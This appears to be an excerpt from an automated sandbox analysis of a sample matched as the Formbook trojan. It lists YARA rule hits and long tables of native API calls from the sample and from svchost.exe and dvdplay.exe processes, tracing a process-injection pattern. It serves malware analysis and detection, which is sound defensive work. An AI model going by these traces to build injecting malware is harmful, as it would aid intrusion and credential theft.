            Source: 00000001.00000002.1862646981.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042C753 NtClose,1_2_0042C753
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B60 NtClose,LdrInitializeThunk,1_2_03472B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03472DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03472C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034735C0 NtCreateMutant,LdrInitializeThunk,1_2_034735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474340 NtSetContextThread,1_2_03474340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03474650 NtSuspendThread,1_2_03474650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BE0 NtQueryValueKey,1_2_03472BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BF0 NtAllocateVirtualMemory,1_2_03472BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472B80 NtQueryInformationFile,1_2_03472B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472BA0 NtEnumerateValueKey,1_2_03472BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AD0 NtReadFile,1_2_03472AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AF0 NtWriteFile,1_2_03472AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472AB0 NtWaitForSingleObject,1_2_03472AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F60 NtCreateProcessEx,1_2_03472F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F30 NtCreateSection,1_2_03472F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FE0 NtCreateFile,1_2_03472FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472F90 NtProtectVirtualMemory,1_2_03472F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FA0 NtQuerySection,1_2_03472FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472FB0 NtResumeThread,1_2_03472FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E30 NtWriteVirtualMemory,1_2_03472E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EE0 NtQueueApcThread,1_2_03472EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472E80 NtReadVirtualMemory,1_2_03472E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472EA0 NtAdjustPrivilegesToken,1_2_03472EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D00 NtSetInformationFile,1_2_03472D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D10 NtMapViewOfSection,1_2_03472D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472D30 NtUnmapViewOfSection,1_2_03472D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DD0 NtDelayExecution,1_2_03472DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472DB0 NtEnumerateKey,1_2_03472DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C60 NtCreateKey,1_2_03472C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472C00 NtQueryInformationProcess,1_2_03472C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CC0 NtQueryVirtualMemory,1_2_03472CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CF0 NtOpenProcess,1_2_03472CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03472CA0 NtQueryInformationToken,1_2_03472CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473010 NtOpenDirectoryObject,1_2_03473010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473090 NtSetValueKey,1_2_03473090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034739B0 NtGetContextThread,1_2_034739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D70 NtOpenThread,1_2_03473D70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03473D10 NtOpenProcessToken,1_2_03473D10
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D4340 NtSetContextThread,LdrInitializeThunk,3_2_035D4340
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D4650 NtSuspendThread,LdrInitializeThunk,3_2_035D4650
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2B60 NtClose,LdrInitializeThunk,3_2_035D2B60
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_035D2BF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_035D2BE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_035D2BA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2AD0 NtReadFile,LdrInitializeThunk,3_2_035D2AD0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2AF0 NtWriteFile,LdrInitializeThunk,3_2_035D2AF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2F30 NtCreateSection,LdrInitializeThunk,3_2_035D2F30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2FE0 NtCreateFile,LdrInitializeThunk,3_2_035D2FE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2FB0 NtResumeThread,LdrInitializeThunk,3_2_035D2FB0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_035D2EE0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_035D2E80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_035D2D10
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_035D2D30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2DD0 NtDelayExecution,LdrInitializeThunk,3_2_035D2DD0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_035D2DF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_035D2C70
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2C60 NtCreateKey,LdrInitializeThunk,3_2_035D2C60
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_035D2CA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D35C0 NtCreateMutant,LdrInitializeThunk,3_2_035D35C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D39B0 NtGetContextThread,LdrInitializeThunk,3_2_035D39B0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2B80 NtQueryInformationFile,3_2_035D2B80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2AB0 NtWaitForSingleObject,3_2_035D2AB0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2F60 NtCreateProcessEx,3_2_035D2F60
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2F90 NtProtectVirtualMemory,3_2_035D2F90
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2FA0 NtQuerySection,3_2_035D2FA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2E30 NtWriteVirtualMemory,3_2_035D2E30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2EA0 NtAdjustPrivilegesToken,3_2_035D2EA0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2D00 NtSetInformationFile,3_2_035D2D00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2DB0 NtEnumerateKey,3_2_035D2DB0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2C00 NtQueryInformationProcess,3_2_035D2C00
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2CC0 NtQueryVirtualMemory,3_2_035D2CC0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D2CF0 NtOpenProcess,3_2_035D2CF0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D3010 NtOpenDirectoryObject,3_2_035D3010
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D3090 NtSetValueKey,3_2_035D3090
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D3D70 NtOpenThread,3_2_035D3D70
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035D3D10 NtOpenProcessToken,3_2_035D3D10
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B490C0 NtCreateFile,3_2_00B490C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B49230 NtReadFile,3_2_00B49230
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B493D0 NtClose,3_2_00B493D0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B49330 NtDeleteFile,3_2_00B49330
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_00B49540 NtAllocateVirtualMemory,3_2_00B49540
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00431BE8
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00446313
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004333BE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004096A00_2_004096A0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0042200C0_2_0042200C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0041A2170_2_0041A217
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004122160_2_00412216
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0042435D0_2_0042435D
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004033C00_2_004033C0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044F4300_2_0044F430
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004125E80_2_004125E8
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044663B0_2_0044663B
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004138010_2_00413801
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0042096F0_2_0042096F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004129D00_2_004129D0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_004119E30_2_004119E3
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0041C9AE0_2_0041C9AE
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0047EA6F0_2_0047EA6F
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0040FA100_2_0040FA10
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044EB590_2_0044EB59
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00423C810_2_00423C81
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00411E780_2_00411E78
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00442E0C0_2_00442E0C
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00420EC00_2_00420EC0
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_0044CF170_2_0044CF17
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_00444FD20_2_00444FD2
            Source: C:\Users\user\Desktop\H1CYDJ8LQe.exeCode function: 0_2_02E736200_2_02E73620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004186431_2_00418643
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168101_2_00416810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004168131_2_00416813
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004100831_2_00410083
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004028A01_2_004028A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E1031_2_0040E103
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004031101_2_00403110
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004025401_2_00402540
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042EDF31_2_0042EDF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FE631_2_0040FE63
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA3521_2_034FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344E3F01_2_0344E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035003E61_2_035003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E02741_2_034E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C02C01_2_034C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C81581_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034301001_2_03430100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA1181_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F81CC1_2_034F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F41A21_2_034F41A2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035001AA1_2_035001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D20001_2_034D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034647501_2_03464750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034407701_2_03440770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343C7C01_2_0343C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345C6E01_2_0345C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034405351_2_03440535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035005911_2_03500591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F24461_2_034F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E44201_2_034E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EE4F61_2_034EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FAB401_2_034FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F6BD71_2_034F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343EA801_2_0343EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034569621_2_03456962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A01_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350A9A61_2_0350A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344A8401_2_0344A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034428401_2_03442840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E8F01_2_0346E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034268B81_2_034268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B4F401_2_034B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03482F281_2_03482F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460F301_2_03460F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E2F301_2_034E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03432FC81_2_03432FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BEFA01_2_034BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440E591_2_03440E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEE261_2_034FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FEEDB1_2_034FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03452E901_2_03452E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FCE931_2_034FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344AD001_2_0344AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DCD1F1_2_034DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343ADE01_2_0343ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03458DBF1_2_03458DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03440C001_2_03440C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03430CF21_2_03430CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E0CB51_2_034E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342D34C1_2_0342D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F132D1_2_034F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0348739A1_2_0348739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B2C01_2_0345B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E12ED1_2_034E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345D2F01_2_0345D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034452A01_2_034452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347516C1_2_0347516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342F1721_2_0342F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0350B16B1_2_0350B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0344B1B01_2_0344B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EF0CC1_2_034EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034470C01_2_034470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F70E91_2_034F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF0E01_2_034FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF7B01_2_034FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034856301_2_03485630
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F16CC1_2_034F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F75711_2_034F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035095C31_2_035095C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DD5B01_2_034DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034314601_2_03431460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FF43F1_2_034FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFB761_2_034FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B5BF01_2_034B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0347DBF91_2_0347DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FB801_2_0345FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFA491_2_034FFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7A461_2_034F7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B3A6C1_2_034B3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EDAC61_2_034EDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DDAAC1_2_034DDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03485AA01_2_03485AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034E1AA31_2_034E1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034499501_2_03449950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345B9501_2_0345B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D59101_2_034D5910
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AD8001_2_034AD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034438E01_2_034438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFF091_2_034FFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD21_2_03403FD2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03403FD51_2_03403FD5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03441F921_2_03441F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFFB11_2_034FFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03449EB01_2_03449EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03443D401_2_03443D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F1D5A1_2_034F1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F7D731_2_034F7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0345FDC01_2_0345FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B9C321_2_034B9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FFCF21_2_034FFCF2
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329402D2_2_0329402D
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329600C2_2_0329600C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032940512_2_03294051
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329408C2_2_0329408C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329C7992_2_0329C799
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329C79C2_2_0329C79C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0328A51C2_2_0328A51C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_032B4D7C2_2_032B4D7C
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_03295DEC2_2_03295DEC
            Source: C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exeCode function: 2_2_0329E5C02_2_0329E5C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365A3523_2_0365A352
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036603E63_2_036603E6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AE3F03_2_035AE3F0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036402743_2_03640274
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036202C03_2_036202C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036281583_2_03628158
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035901003_2_03590100
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0363A1183_2_0363A118
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036581CC3_2_036581CC
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036541A23_2_036541A2
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036601AA3_2_036601AA
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036320003_2_03632000
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035C47503_2_035C4750
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A07703_2_035A0770
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0359C7C03_2_0359C7C0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035BC6E03_2_035BC6E0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A05353_2_035A0535
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036605913_2_03660591
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036524463_2_03652446
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_036444203_2_03644420
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0364E4F63_2_0364E4F6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0365AB403_2_0365AB40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03656BD73_2_03656BD7
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0359EA803_2_0359EA80
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035B69623_2_035B6962
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_0366A9A63_2_0366A9A6
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A29A03_2_035A29A0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035A28403_2_035A2840
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035AA8403_2_035AA840
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035CE8F03_2_035CE8F0
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035868B83_2_035868B8
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03614F403_2_03614F40
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03642F303_2_03642F30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035C0F303_2_035C0F30
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_035E2F283_2_035E2F28
            Source: C:\Windows\SysWOW64\dvdplay.exeCode function: 3_2_03592FC83_2_03592FC8
